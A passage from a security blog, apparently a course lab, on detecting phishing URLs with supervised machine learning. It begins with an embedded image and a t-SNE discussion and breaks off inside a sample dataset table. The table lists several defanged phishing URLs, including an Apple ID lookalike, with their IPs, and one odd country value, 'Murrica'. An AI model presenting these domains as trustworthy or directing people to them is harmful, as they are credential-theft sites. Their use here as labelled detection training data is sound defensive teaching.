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" /><br />
<i>Figure 5. </i>Visualization of URLs in the two-dimensional space after applying the t-SNE technique with <i>min-max feature normalization</i> (phishing links - orange dots, benign links - blue dots).</div>
<div style="text-align: center;">
<br /></div>
<div>
In all the cases, we can see that the links tend to be distributed in two classes. Feature scaling helps to make it look more clear. This confirms that there are attributes or their combinations, the values of which can be used for separation of the objects between the classes.</div>
</div>
<div>
<br /></div>
In the next post, we'll try to apply the cluster analysis to this problem.<br />
If you want to play with the model, the source code is available on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/Courses/ML%20in%20Cybersecurity/Classification/Phishing%20detection">Github</a>.<br />
<br />
To be continued...<br />
<div>
<br /></div>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-37612545790281023892020-03-16T14:17:00.002-07:002020-10-30T11:37:33.741-07:00AI and Cybersecurity. Part 2 - Detecting Phishing URLs with ML<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<img alt="hack fraud card code computer credit crime cyber data hacker identity information internet password phishing pile privacy protection safety secure spy steal technology thief green cartoon text product line font illustration human behavior angle clip art graphics computer wallpaper" height="427" src="https://c.pxhere.com/images/66/ab/1a22a11f23f4a32d21b10fcd0164-1449185.jpg!d" width="640" /></div>
<br />
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-1.html">Part 1</a>, we already got acquainted with AI paradigms and the main ML approaches: supervised, unsupervised, and reinforcement learning. Even though the unsupervised learning approach looks more attractive as you do not need to pre-mark the data for training, supervised learning can be seen as a more precise instrument for detecting malicious objects such as phishing URLs once we have enough labeled data.<br />
<div>
<a name='more'></a><b><br /></b>
<b>Supervised Detection of Phishing</b><br />
<b><br /></b>
The first good thing about phishing is that we can use a database of validated phishing links at Phishtank.org, where new antivirus companies and individual researchers upload new phishing links and they are validated. Benign URLs are also easy to find with Alexa.com that keeps tracking popular websites.<br />
<br />
Second, the variety of techniques for launching phishing webpages is limited by the capabilities of the hosting and domain name registrar, and little has changed over the past 15–20 years, except the fact that certificates began to be used more. Attackers still register domain names that are consonant with the attacked service for the shortest possible time, typically one year. The webpage is hosted locally, or a hacked server is used. Most attacks typically use the HTTP protocol without TLS and certificate. Thus, it is enough to take into consideration the following attributes: a domain name, WhoIs data, geolocation, type of network protocol (HTTP or HTTPS), and, optionally, the presence of the certificate with its parameters.<br />
<br />
We will need a binary classifier to detect phishing URLs. A complex apparatus of deep neural networks (DNN), which requires a large amount of data and computing power for high-quality training, is not necessarily needed to solve such a basic task. It is enough to use traditional classification methods such as discriminant analysis, support vector machine (SVM), decision trees, random forest, or even regression analysis to predict a threat score once you decide to end up with a threat scoring function.<br />
<br />
Consider the task of detecting phishing links based on the following attributes: domain registrar, domain registration period, geolocation of the hosting server and the presence of a secure connection with a valid certificate. I propose my students to solve this problem as a laboratory work. First, they need to create a training dataset, using the Phishtank.com resource as a source of classified phishing links.<br />
<br />
<i>Table 1.</i> An example of dataset with URL attributes and class labels.<br />
<table class="bordered" style="background-color: white; border-collapse: collapse; border: 0px; color: #0d0d0d; font-family: "Pt Sans", Arial, sans-serif; font-size: 15px; list-style: none; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: top; width: auto;"><tbody style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 60px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 60px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">#</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 150px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 260.667px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">URL</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 100px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 100px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">IP address</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 100px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 100px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Registrar</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 60px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 60px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Lifetime</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 60px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 60px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Country</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 100px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 100px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Class</strong></td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]admin<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>palmariguani<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>com/...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">192.186.205.8</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">2</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">US</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">2</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]www<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>whoes<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>info/docs/fox/dropbox/</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">107.180.26.63</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">Murrica</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">3</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]www<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>apple-id<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>ldn-app<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>mobi/apple</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">208.109.255.48</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">US</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">4</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[http://]v01-apple<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>co<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>uk</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">45.79.129.214</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">godaddy</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">1</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">UK</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">phishing</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">5</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[https://]www<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>bth<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>se/</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">194.47.131.132</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">SE Direkt</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">14</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">SE</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">benign</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">6</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">[https://]wikipedia<span style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">.</span>com</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">208.80.154.238</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">MARKMONITOR INC.</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">16</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">US</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">benign</td></tr>
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">7</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 